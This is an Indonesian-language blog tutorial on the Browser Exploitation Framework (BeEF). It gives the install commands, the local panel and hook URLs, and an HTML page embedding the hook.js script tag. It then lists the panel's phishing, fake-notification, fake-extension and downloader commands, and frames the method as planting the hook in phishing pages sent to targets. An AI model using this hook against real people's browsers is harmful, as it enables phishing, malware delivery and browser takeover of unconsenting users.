Open in app

Sign in

Write

Sign in

Hack4Fun Academy
3 min readNov 25, 2023

Apa itu Browser Exploitation Framework Dan cara melakukannya

Apa itu BEEF atau browser exploitation framework ? Adalah sebuah tahap dimana seorang hacker akan melakukan exploitasi terhadap browser jadi misal seorang hacker akan membuat sebuah phishing page yang ternyata di dalamnya ada JavaScript atau HTML code yang akan membuat koneksi ke BEEF kita, jadi seperti teknik hooking

Jadi misal kalian ingin mengakses websites yang bernama https://hookwebsites.com, nah kita tidak tau apakah websites ini sudah di letakkan hook di html code atau javascript code yang akan membuat koneksi ke BEEF hacker tersebut

Nah jika koneksi Kita terhadap beef attacker tersebut ini sudah berjalan dengan lancar, attacker akan bisa melakukan serangan terhadap komputer kita seperti :

-Melancarkan serangan phishing
-Mengirimkan malware di komputer kita
-Man in the browser
-Fake Notifications

Masih banyak fitur lainnya, saya akan menjelaskan beberapa fitur di blogs ini

Disini saya akan menjelaskan hanya cara untuk melakukannya menggunakan local IP Dan machine saya sendiri, jadi tentu kalian perlu melakukan beberapa setup agar bisa menanamkam hook di websites phishing kalian

Pertama saya akan menjelaskan cara menginstall BEEF di kali linux kalian

Instalasi Beef

git clone https://github.com/beefproject/beef
cd beef
chmod +x install
./install

untuk menjalankan beef tinggal ketik
./beef

Nah jika sudah akan terlihat seperti gambar di bawah

Kalian bisa liat untuk hook url saya adalah 127.0.0.1:3000/hook.js Dan untuk panel adalah 127.0.0.1:3000/ui/panel

Tampilan beef panel akan seperti di bawah ini :

Nah jika sudah kita tinggal mengirimkan hook url ke target, tapi untuk melakukan Hal tersebut kita perlu membuat simpel html code dulu untuk membuat target bisa mengakses hook JavaScript kita

Kalian bisa membuat code html kalian sendiri asal kalian harus menambahkan script untuk ke hook.js nya

<html>
<head>
  <script src="http://127.0.0.1:3000/hook.js" type=’text/javascript’></script>
</head>
<body>
  Your browser is hooked!
</body>
</html>

note : save file ke /var/www/html

jika sudah Mari kita akses websites hooknya disini websites hook saya adalah 127.0.0.1/hook.html

Nah boom target sudah melakukan koneksi ke BEEF kita

Nah kalian tinggal ke commands tab, disini kita bisa melakukan banyak command, phishing, screenshot, fake notification, fake extension, downloader dll seperti di bawah ini

Kalian tinggal explore commandnya satu persatu yaaa

Sekian dari saya LuffySec Makasih :D

Saya harap kalian bisa belajar banyak dari sini

Beef
Browsers
Exploitation
Framework
Hacking
Hack4Fun Academy
Hack4Fun Academy

Written by Hack4Fun Academy

43 Followers
2 Following

Community that teach u all about hacking world, Founder LuffySec

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams